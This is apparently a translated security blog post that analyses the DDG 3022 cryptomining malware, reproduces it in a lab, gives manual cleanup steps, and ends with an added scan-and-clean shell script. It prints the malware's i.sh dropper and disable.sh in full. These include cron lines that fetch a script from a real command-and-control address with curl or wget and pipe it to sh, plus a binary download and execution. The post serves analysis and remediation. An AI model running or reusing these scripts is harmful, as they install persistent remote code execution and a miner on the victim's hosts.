This post reproduces the new DDG variant 3022 based on the analysis recently published by 360Netlab, and covers part of the analysis plus removal methods. It is intended for study and exchange only and to give victims a starting point for cleanup; do not use it for illegal purposes. The author bears no responsibility for any consequences. For details see: https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

1. Download

The download script is http://119.9.106.27:8000/i.sh; naming it i.sh is ddgs' usual style. Sample location: 119.9.106.27:8000/static/3022/

First download the i.sh script and look at its contents (the quotes, redirections and operators stripped by the page extraction are restored here; this is the malware's own script as the post shows it):

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "*/15 * * * * (curl -fsSL http://119.9.106.27:8000/i.sh||wget -q -O- http://119.9.106.27:8000/i.sh) | sh" | crontab -
    echo "" > /var/spool/cron/root
    echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/root
    mkdir -p /var/spool/cron/crontabs
    echo "" > /var/spool/cron/crontabs/root
    echo "*/15 * * * * wget -q -O- http://119.9.106.27:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

    cd /tmp
    touch /usr/local/bin/writeable && cd /usr/local/bin/
    touch /usr/libexec/writeable && cd /usr/libexec/
    touch /usr/bin/writeable && cd /usr/bin/
    rm -rf /usr/local/bin/writeable /usr/libexec/writeable /usr/bin/writeable

    export PATH=$PATH:$(pwd)
    ps auxf | grep -v grep | grep lrnbbce || rm -rf lrnbbce
    if [ ! -f lrnbbce ]; then
        wget -q http://119.9.106.27:8000/static/3022/ddgs.$(uname -m) -O lrnbbce
    fi
    chmod +x lrnbbce
    $(pwd)/lrnbbce || /usr/bin/lrnbbce || /usr/libexec/lrnbbce || /usr/local/bin/lrnbbce || lrnbbce || ./lrnbbce || /tmp/lrnbbce

    ps auxf | grep -v grep | grep lrnbbcb | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep lrnbbcc | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep lrnbbcd | awk '{print $2}' | xargs kill -9

This is the old DDG routine: set the PATH, add a cron job (both through `crontab -` and by writing the spool files directly, every 15 minutes), probe which of /usr/local/bin, /usr/libexec and /usr/bin is writable and drop the miner there (falling back to /tmp), download the architecture-specific ddgs binary as lrnbbce and run it, then kill and disable other mining trojans (competition in the mining business is fierce). Note that the drop directory is whichever one the `touch ... && cd` chain last succeeded in, so lrnbbce may not be in /usr/bin on every host. Since version 3014, DDG also pulls a cloud-delivered disable.sh to centrally kill competitors. Script address: http://119.9.106.27:8000/static/disable.sh; contents (operators restored as above):

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    mkdir -p /opt/yilu/work/{xig,xige} /usr/bin/bsd-port
    touch /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
    chmod -w /opt/yilu/work/xig /opt/yilu/work/xige /usr/bin/bsd-port
    chmod -x /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
    chattr +i /opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige /tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus /usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64

    rm -rf /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
    touch /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
    chmod -rw /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux
    chattr +i /etc/init.d/{DbSecuritySpt,selinux} /etc/rc{1..5}.d/S97DbSecuritySpt /etc/rc{1..5}.d/S99selinux

    if [ -e /tmp/gates.lod ]; then
        rm -rf $(readlink /proc/$(cat /tmp/gates.lod)/exe)
        kill -9 $(cat /tmp/gates.lod)
        rm -rf $(readlink /proc/$(cat /tmp/moni.lod)/exe)
        kill -9 $(cat /tmp/moni.lod)
        rm -rf /tmp/{gates,moni}.lod
    fi

    ps auxf | grep -v grep | grep /tmp/thisxxs | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep /opt/yilu/work/xig/xig | awk '{print $2} ' | xargs kill -9
    ps auxf | grep -v grep | grep /opt/yilu/mservice | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep /usr/bin/.sshd | awk '{print $2}' | xargs kill -9
    ps auxf | grep -v grep | grep /usr/bin/bsd-port | awk '{print $2}' | xargs kill -9

The script gathers the competing miner processes to kill: yilu, the gates process of the BillGates family, and so on. It does not just kill them; it plants empty, non-writable, non-executable files at the paths those families install to and marks them immutable with `chattr +i`, so the competitor cannot reinstall. These dummy files survive a cleanup of DDG itself and should be unlocked and removed afterwards. All of this was the earlier version, though; the current one is more advanced and delivers a binary, disable, directly. For what disable does, refer to the 360 article (image from the 360Netlab blog).

To block other mining programs, ddg 3022 currently does the following:
1. Modifies the hosts file to block delivery of other miners.
2. Kills other mining processes.
3. Uses the disable binary.

2. Running and reproduction

Next, run the script to start the reproduction (screenshots in the original post):

The crontab entry has been written.
The CPU is fully loaded; the mining program is running.
The sample files are visible in the /tmp directory.

3. Cleanup

Old routine: whatever the mining trojan did, we do the reverse. Do it in this order, because the cron job re-downloads i.sh every 15 minutes and would otherwise reinfect the host while you are still deleting files:

Remove the `*/15 * * * * ... http://119.9.106.27:8000/i.sh ... | sh` entry from /var/spool/cron/crontabs/root and /var/spool/cron/root (the `crontab -` install lands in one of these two spool files as well; `crontab -l` as root shows whether it is still there).
Kill the processes 6Tx3Wq and lrnbbce.
Delete /tmp/6Tx3Wq, /tmp/disable and /usr/bin/lrnbbce (check /usr/local/bin, /usr/libexec and /tmp too, since i.sh drops lrnbbce into the first directory it could write to).

At this point the miner is cleaned up; afterwards, remove the hosts entries that were added and the other leftover files (including the immutable dummies created by disable.sh, which need `chattr -i` before they can be deleted).

References
https://blog.netlab.360.com/https-blog-netlab-360-com-a-fast-ddg-3014-analyze/
https://blog.netlab.360.com/fast-analyze-ddg-v3021-and-v3022/

Reposted from: https://www.cnblogs.com/Id3al/p/10706324.html
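The following script is an added example and is not code from the original post or from 360Netlab. It turns the indicators quoted above (the cron entries pointing at 119.9.106.27:8000/i.sh, the lrnbbce / 6Tx3Wq / disable files, the paths disable.sh makes immutable, and the hosts-file tampering) into a scan-and-clean helper that follows the cleanup order given in section 3. It takes a root-directory prefix so the logic can be dry-run against a copied or constructed filesystem tree; the function names, the report format and the decision to only flag (not edit) hosts entries are assumptions of this example.

```shell
#!/usr/bin/env bash
# Added example, not code from the original post or from 360Netlab.
# Audits a host for the DDG 3022 indicators listed in the post and reverses
# them. ROOT is a path prefix ("/" on a live host) so the logic can be tested
# against a constructed tree. The C2 address, the dropped file/process names
# and the paths locked by disable.sh are those the post lists; the function
# names and the "kind:detail" report format are assumptions of this example.

C2='119.9.106.27:8000'
DROP_NAMES='lrnbbce 6Tx3Wq disable'   # files the infection leaves behind
KILL_NAMES='lrnbbce 6Tx3Wq'           # processes the post says to kill
# i.sh cd's into the first of these it can write to and drops lrnbbce there,
# falling back to /tmp, so every candidate directory has to be checked
DROP_DIRS='/usr/local/bin /usr/libexec /usr/bin /tmp'
CRON_FILES='/var/spool/cron/root /var/spool/cron/crontabs/root'
# dummy paths disable.sh creates and marks immutable to block competitors
LOCKED='/opt/yilu/mservice /opt/yilu/work/xig/xig /opt/yilu/work/xige/xige
/tmp/thisxxs /usr/bin/.sshd /usr/bin/bsd-port/getty /usr/bin/bsd-port/.dbus
/usr/bin/bsd-port/nmi /tmp/php /tmp/name /tmp/xc.x86_64
/etc/init.d/DbSecuritySpt /etc/init.d/selinux'

# ddg_scan ROOT: print one "kind:detail" line per indicator found under ROOT
ddg_scan() {
  local root="${1%/}" f d n
  for f in $CRON_FILES; do
    [ -f "$root$f" ] && grep -q "$C2/i\.sh" "$root$f" 2>/dev/null && echo "cron:$f"
  done
  for d in $DROP_DIRS; do
    for n in $DROP_NAMES; do
      [ -e "$root$d/$n" ] && echo "file:$d/$n"
    done
  done
  for f in $LOCKED; do
    [ -e "$root$f" ] && echo "locked:$f"
  done
  # the post says 3022 rewrites /etc/hosts to sinkhole rival download hosts but
  # does not list the entries, so only flag non-localhost sinkhole lines for review
  [ -f "$root/etc/hosts" ] && grep -E '^[[:space:]]*(0\.0\.0\.0|127\.0\.0\.1)[[:space:]]' "$root/etc/hosts" \
    | grep -v localhost | sed 's/^/hosts-review:/'
  if [ -z "$root" ]; then   # process checks only make sense on the live host
    for n in $KILL_NAMES; do
      pgrep -x "$n" >/dev/null 2>&1 && echo "proc:$n"
    done
  fi
  return 0
}

# ddg_clean ROOT: cron first (so nothing re-downloads in 15 minutes), then
# processes, then files; hosts entries are left for manual review
ddg_clean() {
  local root="${1%/}" f d n
  for f in $CRON_FILES; do
    [ -f "$root$f" ] && sed -i "\#$C2/i\.sh#d" "$root$f"
  done
  if [ -z "$root" ]; then
    for n in $KILL_NAMES; do pkill -9 -x "$n" 2>/dev/null || true; done
  fi
  for d in $DROP_DIRS; do
    for n in $DROP_NAMES; do
      rm -f "$root$d/$n"
    done
  done
  for f in $LOCKED; do   # unlock the dummies; the admin decides on removal
    [ -e "$root$f" ] && { chattr -i "$root$f" 2>/dev/null || true; }
  done
  return 0
}

case "${1:-}" in
  scan)  ddg_scan  "${2:-/}" ;;
  clean) ddg_clean "${2:-/}" ;;
esac
```

Run `sudo bash ddg3022.sh scan /` first and read the report; `clean` is deliberately conservative: it removes only the cron line, the named processes and the named drop files, and merely clears the immutable bit on the dummy paths from disable.sh, since deleting things under /etc/init.d should be a human decision.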